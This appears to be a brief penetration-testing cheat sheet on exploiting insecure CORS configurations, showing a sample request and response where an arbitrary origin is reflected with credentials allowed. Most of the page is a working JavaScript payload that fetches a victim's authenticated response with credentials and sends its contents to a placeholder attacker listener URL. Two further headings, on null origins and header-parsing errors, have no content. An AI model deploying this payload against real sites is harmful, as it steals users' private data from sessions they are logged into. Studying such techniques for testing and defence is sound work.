CORS
Insecure configurations
Access allowed from any domain
GET <trget url> HTTP/1.1
Host: <target url>
Origin: <listener url>HTTP/1.1 200 OK
Access-Control-Allow-Origin: <listener url>
Access-Control-Allow-Credentials: truePayload
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','<url>',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='<listener url>/log'+this.responseText;
};Allowed NULL Origin
Payload
CORS Headers parsing error
Last updated